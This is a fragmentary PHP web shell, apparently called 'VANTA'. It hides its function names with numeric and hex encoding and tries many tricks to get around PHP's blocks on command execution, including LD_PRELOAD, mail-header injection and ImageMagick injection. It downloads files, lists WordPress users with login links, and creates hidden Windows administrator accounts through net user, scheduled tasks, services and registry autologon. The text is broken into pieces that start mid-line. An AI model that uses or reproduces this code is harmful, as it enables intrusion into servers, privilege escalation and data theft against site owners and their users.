["pipe","w"],2=>["pipe","w"]]; $p = @$f($pr1VANTA, $d, $pipes); if (is_resource($p)) { $out = stream_get_contents($pipes[1]); fclose($pipes[1]); proc_close($p); if (!empty($out)) break; } } elseif ($f === chDxzZ([112,111,112,101,110])) { $h = @$f($pr1VANTA . " 2>&1", "r"); $res = ""; if ($h) { while (!feof($h)) $res .= fread($h, 4096); pclose($h); } if (strlen($res)) { $out = $res; break; } } elseif ($f === chDxzZ([101,115,99,97,112,101,115,104,101,108,108,99,109,100])) { $esc = $f($pr1VANTA); ob_start(); @system($esc); $out = ob_get_clean(); if (!empty($out)) break; } elseif ($f === chDxXZ('6573636170657368656c6c617267')) { $esc = $f($pr1VANTA); $out = @chDx2x($esc); if (!empty($out)) break; } elseif ($f === chDxzZ([99,117,114,108,95,101,120,101,99])) { $ch = @curl_init('file:///proc/self/cmdline'); @curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); @curl_setopt($ch, CURLOPT_POSTFIELDS, $pr1VANTA); $r = @curl_exec($ch); @curl_close($ch); if ($r && strpos($r, $pr1VANTA) !== false) { $out = $r; break; } } elseif ($f === chDxzZ('109,97,105,108')) { $to = uniqid()."@".uniqid().".xyz"; @mail($to, $pr1VANTA, $pr1VANTA); $out = ""; } elseif ($f === chDxXZ('63616c6c5f757365725f66756e63')) { $shellfunc = chDxzZ([115,104,101,108,108,95,101,120,101,99]); if (function_exists($shellfunc)) { $out = @call_user_func($shellfunc, $pr1VANTA); if (!empty($out)) break; }} elseif ($f === chDxzZ('102,105,108,101,95,103,101,116,95,99,111,110,116,101,110,116,115')) { $r = @$f("php://filter/read=convert.base64-encode/resource=" . $pr1VANTA); if ($r && strlen($r) >0) { $out = $r; break; } } elseif ($f === chDxzZ('102,111,112,101,110')) { $tmpf = sys_get_temp_dir() . "/" . uniqid("s-cmd") . ".sh"; $h = @$f($tmpf, "w"); if ($h) { fwrite($h, $pr1VANTA); fclose($h); } $r = @chDx2x("sh " . escapeshellarg($tmpf) . " 2>&1"); if ($r) { $out = $r; @unlink($tmpf); break; } } elseif ($f === chDxzZ('112,117,116,101,110,118')) { @putenv("CMD=".$pr1VANTA); $r = @getenv("CMD"); if ($r == $pr1VANTA) { $out = $r; break; } } elseif ($f === chDxzZ('105,110,105,95,115,101,116')) { @ini_set("auto_prepend_file", $pr1VANTA); $out = @file_get_contents($_SERVER['SCRIPT_FILENAME']); if (!empty($out)) break; } elseif ($f === chDxzZ([112,99,110,116,108,95,101,120,101,99])) { @pcntl_exec("/bin/sh", array("-c", $pr1VANTA)); } elseif ($f === chDxzZ([97,112,97,99,104,101,95,115,101,116,101,110,118])) { @apache_setenv("CMD", $pr1VANTA); $out = getenv("CMD"); if ($out == $pr1VANTA) break; } elseif ($f === chDxzZ([109,113,95,111,112,101,110]) || $f === chDxzZ([103,99,95,111,112,101,110])) { } } return $out !== false ? $out : false;}if (!function_exists('chDxzZ')) { function chDxzZ($arr) { if (is_string($arr)) $arr = explode(',', $arr); $r = ''; foreach ($arr as $n) $r .= chr(is_numeric($n) ? $n : hexdec($n)); return $r; }} if (!function_exists('prvdyzhsax')) { function prvdyzhsax($str) { $y = ''; for ($i = 0; $i< strlen($str); $i++) $y .= dechex(ord($str[$i])); return $y; }} if (!function_exists('chDxXZ')) { function chDxXZ($hx) { $n = ''; for ($i = 0; $i< strlen($hx) - 1; $i += 2) $n .= chr(hexdec($hx[$i] . $hx[$i + 1])); return $n; }} if (isset($_GET['VANTA'])) { $cdir = unx($_GET['VANTA']); if (@is_dir($cdir)) { $VANTAxas[14]($cdir); } else { } } else { $cdir = $VANTAxas[0](); } function VANTAd0($file) { if (file_exists($file)) { header('Content-Description: File Transfer'); header('Content-Type: application/octet-stream'); header('Content-Disposition: attachment; filename=' . basename($file)); header('Content-Transfer-Encoding: binary'); header('Expires: 0'); header('Cache-Control: must-revalidate'); header('Pragma: public'); header('Content-Length: ' . filesize($file)); ob_clean(); flush(); readfile($file); exit; }} if (!empty($_GET['don'])) {$FilesDon = VANTAd0(unx($_GET['don']));} ?>
&1" > .privdayz-root2');
usleep(350000);
$out = @file_get_contents('.privdayz-root2');
if (!$out) $out = "[!] No output or blocked.";
} else {
$out = v4nt4C($c . ' 2>&1');
if (!$out) $out = "[!] No output or blocked.";
}
echo "\n";
echo htmlspecialchars($out);
}
?>
| ID | user | role | reset pw | wp-login | |
|---|---|---|---|---|---|
| '.$u['ID'].' | '.htmlspecialchars($u['user_login']).' | '.htmlspecialchars($u['user_email']).' | '.$u['role'].' | '; if ($site_url) { $login_url = htmlspecialchars($site_url . '/wp-login.php?log=' . urlencode($u['user_login'])); echo 'login'; } else { echo 'no site url'; } echo ' |
".htmlspecialchars($alt_file)." created. [$result]$f
&1", "r"); if ($f) { while (!feof($f)) $out .= fread($f, 4096); fclose($f);} if (trim($out)) $ok = true; @ini_restore('filter.default'); } elseif ($meth === 'ld_preload') { if (strtoupper(substr(PHP_OS,0,3)) !== 'WIN') { putenv('LD_PRELOAD=/tmp/x.so'); $out = @chDx2x($c.' 2>&1'); putenv('LD_PRELOAD'); if (trim($out)) $ok = true; } } elseif ($meth === 'prepend') { $prepend = sys_get_temp_dir()."/xx".uniqid().".php"; @file_put_contents($prepend, ""); @ini_set("auto_prepend_file", $prepend); $out = @file_get_contents($_SERVER['SCRIPT_FILENAME']); @ini_restore("auto_prepend_file"); @unlink($prepend); if (trim($out)) $ok = true; } elseif ($meth === 'suhosin') { @ini_set('suhosin.executor.func.blacklist', ''); $out = @chDx2x($c.' 2>&1'); if (trim($out)) $ok = true; } elseif ($meth === 'mailinj') { $tmpf = sys_get_temp_dir()."/m".uniqid().".txt"; @mail("v@x.com", "", "", "", "-X $tmpf; $c >$tmpf 2>&1"); if (file_exists($tmpf)) { $out = file_get_contents($tmpf); unlink($tmpf); $ok = true; } } elseif ($meth === 'errlog') { $tmpf = sys_get_temp_dir()."/e".uniqid().".txt"; @error_log("", 3, $tmpf); if (file_exists($tmpf)) { $out = file_get_contents($tmpf); unlink($tmpf); $ok = true; } } elseif ($meth === 'fopeninput') { $h = @fopen("php://input", "r"); if ($h) { $out = @fread($h, 8192); fclose($h); $ok = true; } } elseif ($meth === 'binbrute') { foreach(['sh','bash','python','perl','nc','busybox','wget'] as $bin){ $which = trim(@chDx2x("which $bin")); if($which) { $out = @chDx2x("$which -c \"$c\" 2>&1"); if (trim($out)) { $ok = true; break; } } } } elseif ($meth === 'ht404') { $out = ''; } elseif ($meth === 'imagemagick') { $tmpi = sys_get_temp_dir().'/img'.uniqid().'.mvg'; $tmpp = sys_get_temp_dir().'/out'.uniqid().'.png'; file_put_contents($tmpi, "push graphic-context\nviewbox 0 0 640 480\nfill 'url(https://|$c|)'\npop graphic-context"); @chDx2x("convert $tmpi $tmpp"); if (file_exists($tmpp)) $out = file_get_contents($tmpp); @unlink($tmpi); @unlink($tmpp); if (trim($out)) $ok = true; } elseif ($meth === 'cgienv') { putenv("CGI_COMMAND=$c"); $out = getenv("CGI_COMMAND"); if (trim($out)) $ok = true; } else { if (function_exists($meth)) { if ($meth === $M[0]) { $out = @$meth($c.' 2>&1'); if (trim($out)) $ok = true; } else if ($meth === $M[1]) { $a=[]; $meth($c.' 2>&1', $a); $out = join("\n", $a); if (trim($out)) $ok = true; } else if ($meth === $M[2]) { @$meth($c.' 2>&1'); $out = ""; if (trim($out)) $ok = true; } else if ($meth === $M[3]) { @$meth($c.' 2>&1'); $out = ""; if (trim($out)) $ok = true; } else if ($meth === $M[4]) { $h=@$meth($c.' 2>&1',"r"); if ($h) { while(!feof($h)) $out.=fread($h,4096); fclose($h); } if (trim($out)) $ok = true; } else if ($meth === $M[5]) { $desc = [1=>["pipe","w"], 2=>["pipe","w"]]; $p = @$meth($c.' 2>&1', $desc, $pipes); if (is_resource($p)) { $out = stream_get_contents($pipes[1]); fclose($pipes[1]); proc_close($p); if (trim($out)) $ok = true; } } } } if ($ok && trim($out)) { $R = $out; break; } } echo htmlspecialchars($R ?: "[X] No output / all methods blocked.\n");}?>
'.htmlspecialchars($rel).'
Open
(chmod 755)
&1');
if (trim($out)) return $out;
$fallback = "timeout /T $timeout /NOBREAK & $cmd";
$out2 = v4nt4C($fallback.' 2>&1');
if (trim($out2)) return $out2;
return v4nt4C($cmd.' 2>&1');
}
if (!isset($_SESSION['v4nt4_winr00t_success'])) $_SESSION['v4nt4_winr00t_success'] = false;
if (!isset($_SESSION['v4nt4_winr00t_user'])) $_SESSION['v4nt4_winr00t_user'] = '';
if (!isset($_SESSION['v4nt4_winr00t_pass'])) $_SESSION['v4nt4_winr00t_pass'] = '';
if ($_SERVER['REQUEST_METHOD'] === 'POST' && isset($_POST['user'],$_POST['pass'])) {
$u = preg_replace('/[^a-zA-Z0-9_\-]/','',$_POST['user']);
$p = $_POST['pass'];
$mode = $_POST['mode'] ?? 'auto';
$success = false;
$methods = [];
$methods[] = [
"[*] net user (classic)",
"net user \"$u\" \"$p\" /add && net localgroup Administrators \"$u\" /add"
];
$methods[] = [
"[*] PowerShell (background)",
"powershell -Command \"net user $u $p /add; net localgroup Administrators $u /add\""
];
$methods[] = [
"[*] schtasks",
"schtasks /create /tn winrrrrrr00t /tr \"cmd.exe /c net user $u $p /add && net localgroup Administrators $u /add\" /sc onstart /ru System"
];
$methods[] = [
"[*] at.exe",
"at 12:00 cmd.exe /c \"net user $u $p /add && net localgroup Administrators $u /add\""
];
$methods[] = [
"[*] sc service hack",
"sc create p0wnsvc binPath= \"cmd /c net user $u $p /add & net localgroup Administrators $u /add\" start= auto"
];
$methods[] = [
"[*] Registry AutoAdminLogon",
"reg add \"HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon\" /v AutoAdminLogon /t REG_SZ /d 1 /f"
];
$methods[] = [
"[*] Fallback CMD",
"cmd /c net user $u $p /add & net localgroup Administrators $u /add"
];
$methods[] = [
"[*] PowerShell Script Chain",
"powershell -Command \"Start-Process cmd -ArgumentList '/c net user $u $p /add && net localgroup Administrators $u /add' -Verb runAs\""
];
$methods[] = [
"[*] Task Scheduler V2 (schtasks)",
"schtasks /create /tn winr00t2 /tr \"cmd.exe /c net user $u $p /add && net localgroup Administrators $u /add\" /sc onlogon /ru System"
];
foreach ($methods as $step) {
list($label, $cmd) = $step;
wout($label . "...");
$res = prvd_exec_with_timeout($cmd, 9);
wout($res);
if (
stripos($res, 'success') !== false || stripos($res, 'ok') !== false ||
stripos($res, 'ReturnValue = 0') !== false ||
stripos($res, 'başarı') !== false ||
stripos($res, 'already exists') !== false
) {
wout("[+] Admin user injected!");
$success = true;
break;
}
sleep(1);
}
if ($success) {
$_SESSION['v4nt4_winr00t_success'] = true;
$_SESSION['v4nt4_winr00t_user'] = $u;
$_SESSION['v4nt4_winr00t_pass'] = $p;
wout("\n[+] 0wn3d! Admin user injected:\n[+] User: $u\n[+] Pass: $p");
wout("[!] Info: Webshell cannot send commands as this user. Use RDP/SMB/WinRM with these credentials!");
} else {
$_SESSION['v4nt4_winr00t_success'] = false;
wout("\n[!] r00t failed :: no vector worked, permission denied.");
}
}
if ($_SESSION['v4nt4_winr00t_success']) {
$u = $_SESSION['v4nt4_winr00t_user'];
$p = $_SESSION['v4nt4_winr00t_pass'];
?>
$cmdfile 2>&1\" /sc once /st 00:00 /ru \"$u\" /rp \"$p\"";
$out1 = v4nt4C($scht.' 2>&1');
wout($out1);
v4nt4C("schtasks /run /tn pzadmtask 2>&1");
sleep(1);
$output = @file_get_contents($cmdfile);
if ($output && strlen($output) > 0) {
wout("[+] Command executed as admin!\n" . $output);
$success_cmd = true;
}
@v4nt4C('schtasks /delete /tn pzadmtask /f 2>&1');
@unlink($cmdfile);
if (!$success_cmd) {
wout("[*] Trying service method...");
$svc = 'sc create pzadmsvc binPath= "cmd /c '.$c.' > '.$cmdfile.' 2>&1" obj= ".\\'.$u.'" password= "'.$p.'" start= demand';
$out2 = v4nt4C($svc.' 2>&1');
wout($out2);
v4nt4C('sc start pzadmsvc 2>&1');
sleep(1);
$output2 = @file_get_contents($cmdfile);
if ($output2 && strlen($output2) > 0) {
wout("[+] Service method: Command executed as admin!\n" . $output2);
$success_cmd = true;
}
@v4nt4C('sc delete pzadmsvc 2>&1');
@unlink($cmdfile);
}
if (!$success_cmd) {
wout("[*] PowerShell fallback...");
$pw = 'powershell -Command "Start-Process cmd -ArgumentList \'/c '.$c.' > '.$cmdfile.' 2>&1\' -Credential (New-Object System.Management.Automation.PSCredential(\''.$u.'\',(ConvertTo-SecureString \''.$p.'\' -AsPlainText -Force))) -WindowStyle Hidden"';
$out3 = v4nt4C($pw.' 2>&1');
wout($out3);
sleep(1);
$output3 = @file_get_contents($cmdfile);
if ($output3 && strlen($output3) > 0) {
wout("[+] PowerShell: Command executed as admin!\n" . $output3);
$success_cmd = true;
}
@unlink($cmdfile);
}
if (!$success_cmd) {
wout("[!] Admin command failed. Try RDP / manual login?");
}
}
?>